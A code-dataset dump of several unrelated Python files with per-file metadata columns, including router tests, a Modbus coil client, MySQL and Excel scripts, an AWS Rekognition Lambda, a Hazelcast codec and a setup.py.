    child.route('/url', methods='PATCH')('child_url')
    match = child('/url', 'PATCH')
    assert match.target == 'child_url'
    root = Router()
    root.route('/child')(child)
    with pytest.raises(root.NotFound):
        root('/child')
    with pytest.raises(root.NotFound):
        root('/child/unknown')
    with pytest.raises(root.MethodNotAllowed):
        root('/child/url')
    match = root('/child/url', 'PATCH')
    assert match.target == 'child_url'
def test_readme():
    """The README quickstart example works as documented."""
    from http_router import Router
    router = Router(trim_last_slash=True)
    @router.route('/simple')
    def simple():
        return 'simple'
    match = router('/simple')
    assert match.target() == 'simple'
    assert match.params is None
def test_method_shortcuts(router):
    """router.get/post/delete register routes bound to that single method."""
    router.delete('/delete')('DELETE')
    router.get('/get')('GET')
    router.post('/post')('POST')
    # Each target was named after its method, so the sets must line up.
    for route in router.routes():
        method = route.target
        assert route.methods == {method}
def test_benchmark(router, benchmark):
    """Benchmark route resolution over a shuffled mix of static and dynamic routes.

    Fix: ``paths`` was first filled by in-loop appends and then immediately
    rebuilt by an identical list comprehension — the loop appends were dead
    work and have been removed.
    """
    import random
    import string

    CHARS = string.ascii_letters + string.digits
    RANDOM = lambda: ''.join(random.choices(CHARS, k=10))  # noqa
    METHODS = 'GET', 'POST'
    routes = [f"/{ RANDOM() }/{ RANDOM() }" for _ in range(100)]
    routes += [f"/{ RANDOM() }/{{item}}/{ RANDOM() }" for _ in range(100)]
    random.shuffle(routes)
    for route in routes:
        router.route(route, methods=random.choice(METHODS))('OK')
    # Fill the {item} placeholder (if any) with a random path segment.
    paths = [route.format(item=RANDOM()) for route in routes]

    def do_work():
        for path in paths:
            try:
                assert router(path)
            except router.MethodNotAllowed:
                pass

    benchmark(do_work)
| 25.901333
| 97
| 0.616596
| 1,190
| 9,713
| 4.964706
| 0.143697
| 0.063304
| 0.030806
| 0.030467
| 0.380501
| 0.29587
| 0.223934
| 0.193128
| 0.122546
| 0.122546
| 0
| 0.012941
| 0.212396
| 9,713
| 374
| 98
| 25.970588
| 0.759346
| 0.019458
| 0
| 0.237354
| 0
| 0.003891
| 0.158039
| 0.017466
| 0
| 0
| 0
| 0
| 0.357977
| 1
| 0.089494
| false
| 0.027237
| 0.07393
| 0.015564
| 0.194553
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9e0012334031a979e4c8078a3fc972d1c90c1a0
| 5,192
|
py
|
Python
|
speaker/adam.py
|
shannon-jia/speaker
|
31c642f018725dd4878ef6a4e7a19b12b05774c8
|
[
"MIT"
] | null | null | null |
speaker/adam.py
|
shannon-jia/speaker
|
31c642f018725dd4878ef6a4e7a19b12b05774c8
|
[
"MIT"
] | null | null | null |
speaker/adam.py
|
shannon-jia/speaker
|
31c642f018725dd4878ef6a4e7a19b12b05774c8
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# _*_ coding: utf-8 _*_
import asyncio
import logging
import struct
log = logging.getLogger(__name__)
class TcpClientProtocol(asyncio.Protocol):
    """asyncio protocol that mirrors connection state onto its master object."""

    def __init__(self, master):
        # master: the owning client; its `connected` flag is updated here.
        self.master = master

    def connection_made(self, transport):
        self.transport = transport
        self.master.connected = True

    def data_received(self, data):
        log.info('Data received: {!r}'.format(data))

    def connection_lost(self, exc):
        log.error('The server closed the connection')
        # None signals the reconnect loop in Adam._do_connect to retry.
        self.master.connected = None
class Adam(object):
    """Minimal Modbus/TCP client for an Adam-6017-style I/O module.

    Keeps a background reconnect task alive and issues coil read/write
    commands over the transport.
    """

    # NOTE(review): defined but never referenced in this class as shown --
    # presumably a leftover MBAP header template; confirm before removing.
    HEAD = b'\x00\x00\x00\x00\x00\x06'

    def __init__(self, loop, host, port=502):
        self.station_address = 1
        self.function_code = 5
        self.coil_address = 0x10
        self.send_str = b''
        self.loop = loop or asyncio.get_event_loop()
        self.host = host
        self.port = port
        self.connected = None
        # Background task keeps retrying the connection forever.
        self.loop.create_task(self._do_connect())
        self.transport = None
        self.coils_state = 0
        self.transaction_id = 0
        self.protocol_id = 0
        # self.loop.call_later(6, self.keepAlive)

    async def _do_connect(self):
        """Retry loop: (re)establish the TCP connection every 5 seconds."""
        while True:
            await asyncio.sleep(5)
            if self.connected:
                continue
            try:
                xt, _ = await self.loop.create_connection(
                    lambda: TcpClientProtocol(self),
                    self.host,
                    self.port)
                log.info('Connection create on {}'.format(xt))
                self.transport = xt
                self.connected = True
                self.read_coils_status()
                # self.login()
            except OSError:
                log.error('Server not up retrying in 5 seconds...')
            except Exception as e:
                log.error('Error when connect to server: {}'.format(e))

    def _command_head(self, length):
        """Build the 6-byte MBAP header: transaction id, protocol id, length."""
        self.transaction_id += 1
        s = struct.Struct('>HHH')
        values = (self.transaction_id,
                  self.protocol_id,
                  length)
        return s.pack(*values)

    # function code is 1
    def read_coils_status(self):
        """Read 8 coils starting at self.coil_address (function code 0x01)."""
        self.send_str = self._command_head(6)
        s = struct.Struct('>BBHH')
        values = (self.station_address,
                  1,
                  self.coil_address,
                  8)
        self.send_str += s.pack(*values)
        log.info('Adam-6017 read_coil_status...')
        return self.call(self.send_str)

    # function code is 5
    def force_single_coil(self, address, action):
        """Switch one coil; 'ON'/'OFF' map to 0xFF00/0x0000 (function code 0x05)."""
        if action.upper() == 'OFF':
            act = 0x0000
        elif action.upper() == 'ON':
            act = 0xFF00
        else:
            act = 0xFFFF
        self.send_str = self._command_head(6)
        s = struct.Struct('>BBHH')
        values = (self.station_address,
                  5,
                  address,
                  act)
        self.send_str += s.pack(*values)
        # Bug fix: the original format string had a single placeholder for two
        # arguments, silently dropping the coil address from the log line.
        log.info('Adam-6017 Function[0x05]({}) on coil {}'.format(action, address))
        return self.call(self.send_str)

    # function code is f
    def force_multi_coils(self, data):
        """Write 8 coils at once from a bitmask byte (function code 0x0F)."""
        self.send_str = self._command_head(8)
        s = struct.Struct('>BBHHBB')
        values = (self.station_address,
                  0x0f,
                  self.coil_address,
                  0x08,
                  0x01,
                  data)
        self.send_str += s.pack(*values)
        log.info('Adam-6017 Function[0x0F]({})'.format(data))
        return self.call(self.send_str)

    def call(self, cmd):
        """Send raw bytes on the transport; log an error when not connected."""
        log.info('Try to send: {}'.format(cmd))
        if self.transport:
            self.transport.write(cmd)
            log.debug('send cmd to server: {}'.format(cmd))
        else:
            log.error('Invalid server transport.')

    # zone = 0: do-0
    # zone = 1: do-1
    def alarm_task(self, action, task, zone=0):
        """Track the desired coil bitmask and drive the matching single coil."""
        if action.upper() == 'OFF':
            self.coils_state &= ~(1 << zone)
        elif action.upper() == 'ON':
            self.coils_state |= (1 << zone)
        else:
            # Anything else (e.g. 'release') clears all tracked coils.
            self.coils_state = 0
        self.force_single_coil(self.coil_address + zone,
                               action)
        # self.read_coils_status()
        # self.force_multi_coils(self.coils_state)
if __name__ == '__main__':
    log = logging.getLogger("")
    formatter = logging.Formatter("%(asctime)s %(levelname)s " +
                                  "[%(module)s:%(lineno)d] %(message)s")
    # log the things
    log.setLevel(logging.DEBUG)
    ch = logging.StreamHandler()
    ch.setLevel(logging.DEBUG)
    ch.setFormatter(formatter)
    log.addHandler(ch)

    loop = asyncio.get_event_loop()
    port = 8502
    host = '127.0.0.1'
    adam = Adam(loop, host, port)

    # Bug fix: a bare ``asyncio.sleep(10)`` only creates a coroutine object
    # and never waits.  Run it on the loop so the background reconnect task
    # gets a chance to establish the connection before commands are sent.
    loop.run_until_complete(asyncio.sleep(10))

    adam.alarm_task('ON', 1)
    adam.alarm_task('OFF', 1)
    adam.alarm_task('release', 1)
    adam.alarm_task('ON', 1, 1)
    adam.alarm_task('OFF', 1, 1)
    adam.alarm_task('release', 1, 1)
    # Serve requests until Ctrl+C is pressed
    try:
        loop.run_forever()
    except KeyboardInterrupt:
        pass
    # Close the server
    loop.close()
| 28.685083
| 72
| 0.548151
| 612
| 5,192
| 4.486928
| 0.264706
| 0.029133
| 0.040058
| 0.025492
| 0.237436
| 0.171522
| 0.124181
| 0.124181
| 0.124181
| 0.095776
| 0
| 0.028927
| 0.334168
| 5,192
| 180
| 73
| 28.844444
| 0.765404
| 0.061633
| 0
| 0.192593
| 0
| 0
| 0.092219
| 0.009675
| 0
| 0
| 0.008646
| 0
| 0
| 1
| 0.081481
| false
| 0.007407
| 0.022222
| 0
| 0.155556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9e0f660874b7198857a18d3f6b0c75b556083fb
| 721
|
py
|
Python
|
forMySQL/countupgetpoints.py
|
ryosuke0503/DockerMySQL
|
c1f3a8e92623cdf0297cd6f721fb9d92046f4091
|
[
"MIT"
] | null | null | null |
forMySQL/countupgetpoints.py
|
ryosuke0503/DockerMySQL
|
c1f3a8e92623cdf0297cd6f721fb9d92046f4091
|
[
"MIT"
] | null | null | null |
forMySQL/countupgetpoints.py
|
ryosuke0503/DockerMySQL
|
c1f3a8e92623cdf0297cd6f721fb9d92046f4091
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import mysql.connector
import pandas as pd
import sys
#tablename = str(sys.argv[1])
csvname = "result1232.csv"
# Team name whose total score should be computed (from the command line).
target = str(sys.argv[1])

# Connect to MySQL.
conn = mysql.connector.connect(
    host="localhost",
    database="toto",
    user="root",
    password="root"
)
print("connection: "+str(conn.is_connected()))

# Get a cursor (dictionary=True keys rows by column name/alias).
cur = conn.cursor(buffered=True, dictionary=True)

# Security fix: ``target`` comes from argv, so bind it as a query parameter
# instead of splicing it into the SQL string (SQL injection).  This also
# stops shadowing the imported ``mysql`` module with a query string.
sql = ("SELECT SUM(IF( home=%s , homescore , IF( away=%s , awayscore , 0)))"
       " AS total_points FROM matches;")
cur.execute(sql, (target, target))
ret = cur.fetchone()
#print(ret)
print(ret['total_points'])

conn.commit()
cur.close()
conn.close()
| 22.53125
| 111
| 0.660194
| 95
| 721
| 5
| 0.568421
| 0.058947
| 0.042105
| 0.046316
| 0.193684
| 0.193684
| 0.193684
| 0.193684
| 0.193684
| 0.193684
| 0
| 0.014469
| 0.137309
| 721
| 32
| 112
| 22.53125
| 0.749196
| 0.120666
| 0
| 0
| 0
| 0
| 0.299363
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.047619
| 0.142857
| 0
| 0.142857
| 0.095238
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7567342e6e2ce849445abb8610ff24fc2aab8a0f
| 558
|
py
|
Python
|
stack/lambdas/rekopoc-check-status/lambda_function.py
|
anapt/rekognition-video-people-blurring-cdk
|
ce1a57178bcd81a17d7f287ff4ccf2be6aae93b2
|
[
"MIT-0"
] | 9
|
2021-10-01T08:21:03.000Z
|
2022-03-02T14:34:16.000Z
|
stack/lambdas/rekopoc-check-status/lambda_function.py
|
anapt/rekognition-video-people-blurring-cdk
|
ce1a57178bcd81a17d7f287ff4ccf2be6aae93b2
|
[
"MIT-0"
] | null | null | null |
stack/lambdas/rekopoc-check-status/lambda_function.py
|
anapt/rekognition-video-people-blurring-cdk
|
ce1a57178bcd81a17d7f287ff4ccf2be6aae93b2
|
[
"MIT-0"
] | 3
|
2021-10-01T08:33:32.000Z
|
2022-02-02T22:40:48.000Z
|
import boto3
# Clients created at import time so warm Lambda invocations can reuse them.
reko = boto3.client('rekognition')
# NOTE(review): ``s3`` is never used in this module as shown -- confirm before removing.
s3 = boto3.client('s3')
def lambda_handler(event, context):
    """Report the status of a Rekognition face-detection job.

    Expects ``event`` to carry 'job_id', 's3_object_bucket' and
    's3_object_key'; echoes the object location back alongside the job status.
    """
    job_id = event['job_id']
    # Performance fix: reuse the module-level client instead of constructing a
    # fresh boto3 client on every invocation.
    response = reko.get_face_detection(JobId=job_id, MaxResults=100)
    return {
        "statusCode": 200,
        "body":
            {
                "job_id": job_id,
                "job_status": response['JobStatus'],
                "s3_object_bucket": event['s3_object_bucket'],
                "s3_object_key": event['s3_object_key']
            }
    }
| 26.571429
| 75
| 0.577061
| 62
| 558
| 4.887097
| 0.467742
| 0.082508
| 0.145215
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.040609
| 0.293907
| 558
| 20
| 76
| 27.9
| 0.728426
| 0
| 0
| 0
| 0
| 0
| 0.227599
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.058824
| 0
| 0.176471
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
756a6183aee4660b960c432b4510670a699bf9cb
| 1,314
|
py
|
Python
|
hazelcast/protocol/codec/count_down_latch_await_codec.py
|
tonytheonlypony/hazelcast-python-client
|
3aafeaf2ebc05aee4f2386c62c079db496a7c81f
|
[
"Apache-2.0"
] | 98
|
2015-12-08T14:26:27.000Z
|
2022-03-23T17:44:11.000Z
|
hazelcast/protocol/codec/count_down_latch_await_codec.py
|
tonytheonlypony/hazelcast-python-client
|
3aafeaf2ebc05aee4f2386c62c079db496a7c81f
|
[
"Apache-2.0"
] | 396
|
2016-02-23T11:07:55.000Z
|
2022-03-31T14:26:34.000Z
|
hazelcast/protocol/codec/count_down_latch_await_codec.py
|
tonytheonlypony/hazelcast-python-client
|
3aafeaf2ebc05aee4f2386c62c079db496a7c81f
|
[
"Apache-2.0"
] | 62
|
2015-12-09T11:20:53.000Z
|
2022-01-28T01:30:54.000Z
|
from hazelcast.serialization.bits import *
from hazelcast.protocol.builtin import FixSizedTypesCodec
from hazelcast.protocol.client_message import OutboundMessage, REQUEST_HEADER_SIZE, create_initial_buffer, RESPONSE_HEADER_SIZE
from hazelcast.protocol.codec.custom.raft_group_id_codec import RaftGroupIdCodec
from hazelcast.protocol.builtin import StringCodec
# hex: 0x0B0200
_REQUEST_MESSAGE_TYPE = 721408
# hex: 0x0B0201
_RESPONSE_MESSAGE_TYPE = 721409
# Request fixed-size fields are laid out directly after the request header.
_REQUEST_INVOCATION_UID_OFFSET = REQUEST_HEADER_SIZE
_REQUEST_TIMEOUT_MS_OFFSET = _REQUEST_INVOCATION_UID_OFFSET + UUID_SIZE_IN_BYTES
_REQUEST_INITIAL_FRAME_SIZE = _REQUEST_TIMEOUT_MS_OFFSET + LONG_SIZE_IN_BYTES
# The boolean response value sits directly after the response header.
_RESPONSE_RESPONSE_OFFSET = RESPONSE_HEADER_SIZE
def encode_request(group_id, name, invocation_uid, timeout_ms):
    """Encode a CountDownLatch await request into an outbound message."""
    initial_buf = create_initial_buffer(_REQUEST_INITIAL_FRAME_SIZE, _REQUEST_MESSAGE_TYPE)
    # Fixed-size fields are written at their precomputed offsets.
    FixSizedTypesCodec.encode_uuid(initial_buf, _REQUEST_INVOCATION_UID_OFFSET, invocation_uid)
    FixSizedTypesCodec.encode_long(initial_buf, _REQUEST_TIMEOUT_MS_OFFSET, timeout_ms)
    # Variable-size fields follow as their own frames.
    RaftGroupIdCodec.encode(initial_buf, group_id)
    StringCodec.encode(initial_buf, name, True)
    return OutboundMessage(initial_buf, True)
def decode_response(msg):
    """Decode the boolean result from a CountDownLatch await response."""
    first_frame = msg.next_frame()
    return FixSizedTypesCodec.decode_boolean(first_frame.buf, _RESPONSE_RESPONSE_OFFSET)
| 43.8
| 127
| 0.853881
| 167
| 1,314
| 6.221557
| 0.305389
| 0.06256
| 0.080847
| 0.075072
| 0.162656
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020101
| 0.091324
| 1,314
| 29
| 128
| 45.310345
| 0.850084
| 0.020548
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095238
| false
| 0
| 0.238095
| 0
| 0.428571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
756b0adc0964779163796787d2e6398c5eb4706e
| 980
|
py
|
Python
|
LeetCode/088 Merge Sorted Array.py
|
gesuwen/Algorithms
|
0c9cf4412d76f8b69ef68cc80636323f5a0e5786
|
[
"MIT"
] | null | null | null |
LeetCode/088 Merge Sorted Array.py
|
gesuwen/Algorithms
|
0c9cf4412d76f8b69ef68cc80636323f5a0e5786
|
[
"MIT"
] | null | null | null |
LeetCode/088 Merge Sorted Array.py
|
gesuwen/Algorithms
|
0c9cf4412d76f8b69ef68cc80636323f5a0e5786
|
[
"MIT"
] | null | null | null |
# Array; Two Pointers
# Given two sorted integer arrays nums1 and nums2, merge nums2 into nums1 as one sorted array.
#
# Note:
#
# The number of elements initialized in nums1 and nums2 are m and n respectively.
# You may assume that nums1 has enough space (size that is greater or equal to m + n) to hold additional elements from nums2.
# Example:
#
# Input:
# nums1 = [1,2,3,0,0,0], m = 3
# nums2 = [2,5,6], n = 3
#
# Output: [1,2,2,3,5,6]
class Solution:
    def merge(self, nums1, m, nums2, n):
        """
        :type nums1: List[int]
        :type m: int
        :type nums2: List[int]
        :type n: int
        :rtype: void Do not return anything, modify nums1 in-place instead.
        """
        # Fill nums1 from the back so nothing is overwritten before it is read.
        i, j = m - 1, n - 1
        write = m + n - 1
        while i >= 0 and j >= 0:
            if nums1[i] > nums2[j]:
                nums1[write] = nums1[i]
                i -= 1
            else:
                nums1[write] = nums2[j]
                j -= 1
            write -= 1
        # Any leftovers from nums2 go straight into the front of nums1.
        nums1[:j + 1] = nums2[:j + 1]
| 28.823529
| 125
| 0.533673
| 155
| 980
| 3.374194
| 0.458065
| 0.01912
| 0.049713
| 0.030593
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.07716
| 0.338776
| 980
| 33
| 126
| 29.69697
| 0.729938
| 0.570408
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0
| 0
| 0.181818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
756bf0598578d01db0afb38f8bafb682754f2e0c
| 1,007
|
py
|
Python
|
caf_verilog/test/test_capture_buffer.py
|
chiranthsiddappa/caf_verilog
|
cd3cfd00459dc03518fcce53d5d6ac5194fb2adc
|
[
"MIT"
] | 1
|
2019-06-04T22:05:12.000Z
|
2019-06-04T22:05:12.000Z
|
caf_verilog/test/test_capture_buffer.py
|
chiranthsiddappa/caf_verilog
|
cd3cfd00459dc03518fcce53d5d6ac5194fb2adc
|
[
"MIT"
] | 6
|
2019-04-17T17:21:42.000Z
|
2019-09-11T16:15:28.000Z
|
caf_verilog/test/test_capture_buffer.py
|
chiranthsiddappa/caf_verilog
|
cd3cfd00459dc03518fcce53d5d6ac5194fb2adc
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from .. import capture_buffer as capt_buff
from tempfile import mkdtemp
import os
class TestCaptureBuffer(TestCase):
    """Smoke tests for CaptureBuffer Verilog generation."""

    def test_capture_buffer(self):
        """
        Test that the files are written out for instantiation and testbench.
        :return:
        """
        tmpdir = mkdtemp()
        cb = capt_buff.CaptureBuffer(100, output_dir=tmpdir)
        cb.gen_tb()
        files = os.listdir(tmpdir)
        test_files = ['capture_buffer.v', 'capture_buffer_tb.v', 'capture_buffer_values.txt']
        for file in test_files:
            self.assertIn(file, files)

    def test_capture_buffer_values_file(self):
        """
        Test the file length of capture buffer values file.
        :return:
        """
        tmpdir = mkdtemp()
        # NOTE(review): unlike the test above, gen_tb() is never called here,
        # so presumably the constructor writes the values file -- confirm.
        cb = capt_buff.CaptureBuffer(100, output_dir=tmpdir)
        with open(os.path.join(tmpdir, 'capture_buffer_values.txt')) as cbv:
            lines = len(cbv.readlines())
        self.assertEqual(100, lines)
| 31.46875
| 93
| 0.637537
| 123
| 1,007
| 5.04065
| 0.439024
| 0.167742
| 0.122581
| 0.064516
| 0.193548
| 0.193548
| 0.193548
| 0.193548
| 0.193548
| 0.193548
| 0
| 0.012228
| 0.269116
| 1,007
| 31
| 94
| 32.483871
| 0.830163
| 0.137041
| 0
| 0.210526
| 0
| 0
| 0.105459
| 0.062035
| 0
| 0
| 0
| 0
| 0.105263
| 1
| 0.105263
| false
| 0
| 0.210526
| 0
| 0.368421
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
756c7eea74e1f5249521b52dff9a4f1dfed719d3
| 933
|
py
|
Python
|
db_to_excel.py
|
jfernandez04/fromdb_to_excel
|
f06bfbd83825f887afc814706dc6c34e6ba44f17
|
[
"Apache-2.0"
] | null | null | null |
db_to_excel.py
|
jfernandez04/fromdb_to_excel
|
f06bfbd83825f887afc814706dc6c34e6ba44f17
|
[
"Apache-2.0"
] | 3
|
2018-02-21T20:25:32.000Z
|
2018-02-23T18:25:44.000Z
|
db_to_excel.py
|
jfernandez04/fromdb_to_excel
|
f06bfbd83825f887afc814706dc6c34e6ba44f17
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
import mysql.connector
import xlsxwriter
from query import q, table,columns
from letters import letters
import string
import json
import os
dir_path = os.path.dirname(os.path.realpath(__file__))

# Load MySQL connection settings from config.json next to this script.
with open(dir_path + '/config.json', "r") as json_data_file:
    conf = json.load(json_data_file)

conn = mysql.connector.connect(**conf)
cur = conn.cursor()
cur.execute("set innodb_lock_wait_timeout=100;")

# Header row: one cell per column name from DESCRIBE <table>.
q_describe = "describe " + table + ";"
cur.execute(q_describe)
bdescribe = cur.fetchall()

wb = xlsxwriter.Workbook('test.xlsx')
ws = wb.add_worksheet()

col = 0
for bdes_row in bdescribe:
    # Compatibility fix: use str.upper() -- ``string.upper`` was removed in
    # Python 3 and would crash there.
    ws.write((letters[col] + "1").upper(), bdes_row[0])
    col += 1

# Data rows start on spreadsheet row 2, one query-result row per line.
num1 = 2
cur.execute(q)
data = cur.fetchall()
for row in data:
    col = 0
    for line in range(len(row)):
        cell = (letters[col] + str(num1)).upper()
        ws.write(cell, row[line])
        col += 1
    num1 += 1
wb.close()
| 21.697674
| 62
| 0.681672
| 148
| 933
| 4.175676
| 0.459459
| 0.048544
| 0.038835
| 0.058252
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022164
| 0.177921
| 933
| 42
| 63
| 22.214286
| 0.783572
| 0.012862
| 0
| 0.142857
| 0
| 0
| 0.070729
| 0.031556
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
756f24ba8abf0f406f6c9f0a863f8c02bdb32b06
| 1,317
|
py
|
Python
|
setup.py
|
tyler-a-cox/radio_sim
|
e54891905597578e2be6a9e6a9a201ba1cbd603c
|
[
"BSD-2-Clause"
] | null | null | null |
setup.py
|
tyler-a-cox/radio_sim
|
e54891905597578e2be6a9e6a9a201ba1cbd603c
|
[
"BSD-2-Clause"
] | 2
|
2021-06-22T19:31:52.000Z
|
2021-07-14T21:33:01.000Z
|
setup.py
|
tyler-a-cox/radio_sim
|
e54891905597578e2be6a9e6a9a201ba1cbd603c
|
[
"BSD-2-Clause"
] | null | null | null |
from setuptools import setup
import os
import sys
import json
sys.path.append("radio_sim")
def package_files(package_dir, subdirectory):
    """Walk package_dir/subdirectory and return file paths relative to package_dir.

    The result is suitable for a setuptools ``package_data`` list.
    """
    paths = []
    directory = os.path.join(package_dir, subdirectory)
    for (path, directories, filenames) in os.walk(directory):
        # Fix: strip the package prefix once per directory instead of
        # rebinding ``path`` inside the filename loop on every iteration.
        rel = path.replace(package_dir + "/", "")
        for filename in filenames:
            paths.append(os.path.join(rel, filename))
    return paths
# Collect bundled data files for the package.  Bug fix: these walks previously
# targeted "hera_cal" (a copy/paste leftover from another project), which does
# not exist here and silently produced an empty package_data list.
data_files = package_files("radio_sim", "data") + package_files(
    "radio_sim", "calibrations"
)

setup_args = {
    "name": "radio_sim",
    "version": "0.0.2",
    "author": "Tyler Cox",
    "url": "https://github.com/tyler-a-cox/radio_sim",
    "license": "BSD",
    "description": "Simple radio interferometer simulator for testing nucal",
    "package_dir": {"radio_sim": "radio_sim"},
    "packages": ["radio_sim"],
    "include_package_data": True,
    "scripts": [],
    "package_data": {"radio_sim": data_files},
    "install_requires": [
        "numpy>=1.10",
        "scipy",
        "astropy",
        "pyuvdata",
    ],
    "extras_require": {
        "all": [
            "aipy>=3.0",
        ]
    },
    "zip_safe": False,
}

if __name__ == "__main__":
    # ``setup(*(), ...)`` unpacked an empty tuple -- a no-op; call directly.
    setup(**setup_args)
| 23.945455
| 77
| 0.603645
| 152
| 1,317
| 4.993421
| 0.506579
| 0.073781
| 0.086957
| 0.050066
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007976
| 0.238421
| 1,317
| 54
| 78
| 24.388889
| 0.748754
| 0.050114
| 0
| 0
| 0
| 0
| 0.307692
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023256
| false
| 0
| 0.093023
| 0
| 0.139535
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
756fb9d469af8300eef5fa58dfbcbd277e34d405
| 1,959
|
py
|
Python
|
oremda/pipeline/engine/__init__.py
|
OpenChemistry/oremda
|
3fb4cb8318713b87ecd7999ee2b725da745dd023
|
[
"BSD-3-Clause"
] | 11
|
2021-09-01T23:10:51.000Z
|
2022-03-20T07:39:37.000Z
|
oremda/pipeline/engine/__init__.py
|
OpenChemistry/oremda
|
3fb4cb8318713b87ecd7999ee2b725da745dd023
|
[
"BSD-3-Clause"
] | 22
|
2021-05-18T14:10:27.000Z
|
2021-10-04T15:06:27.000Z
|
oremda/pipeline/engine/__init__.py
|
OpenChemistry/oremda
|
3fb4cb8318713b87ecd7999ee2b725da745dd023
|
[
"BSD-3-Clause"
] | 2
|
2021-09-01T22:11:13.000Z
|
2021-10-30T09:12:36.000Z
|
import asyncio
import logging
import sys
import coloredlogs
import signal
from oremda.typing import ContainerType
from oremda.clients.singularity import SingularityClient
from oremda.pipeline.engine.rpc.client import RpcClient
from oremda.pipeline.engine.context import pipeline_context
from oremda.pipeline.engine.config import settings
# Setup logger: INFO-level colored output on stdout for the "engine" logger.
logger = logging.getLogger("engine")
logger.setLevel(logging.INFO)
handler = logging.StreamHandler(sys.stdout)
handler.setLevel(logging.INFO)
formatter = coloredlogs.ColoredFormatter(
    "%(asctime)s,%(msecs)03d - %(name)s - %(levelname)s - %(message)s"
)
handler.setFormatter(formatter)
logger.addHandler(handler)
async def run():
    """Connect to the pipeline server and serve until the reader closes."""
    # Set the Singularity image path if we are using Singularity
    if settings.OREMDA_CONTAINER_TYPE == ContainerType.Singularity:
        SingularityClient.images_dir = settings.OREMDA_SINGULARITY_IMAGE_DIR
    # The RPC client must live inside the pipeline context's lifetime.
    with pipeline_context() as context:
        async with RpcClient(settings.SERVER_URL, context) as client:
            logger.info("Connected to server.")
            await client.wait_on_reader()
async def shutdown(signal, loop, run_task):
    """Cancel the engine task, drain remaining tasks, and stop the loop.

    :param signal: the ``signal.Signals`` member that triggered shutdown
        (NOTE: this parameter shadows the ``signal`` module in this scope)
    :param loop: the event loop to stop once cleanup is done
    :param run_task: the main engine task created in ``start()``, or None
    """
    logger.info(f"Received exit signal {signal.name}...")

    logger.info("Canceling engine task.")
    if run_task is not None:
        run_task.cancel()

    # Wait for every task other than this shutdown coroutine to finish
    # cancelling before the loop is stopped.
    tasks = [t for t in asyncio.all_tasks() if t is not asyncio.current_task()]
    if tasks:
        logger.info(f"Waiting for {len(tasks)} tasks to complete.")
        await asyncio.wait(tasks)

    logger.info("Stopping event loop.")
    # Bug fix: use the loop passed by the caller. The original re-fetched it
    # with asyncio.get_event_loop(), silently ignoring the parameter.
    loop.stop()
def start():
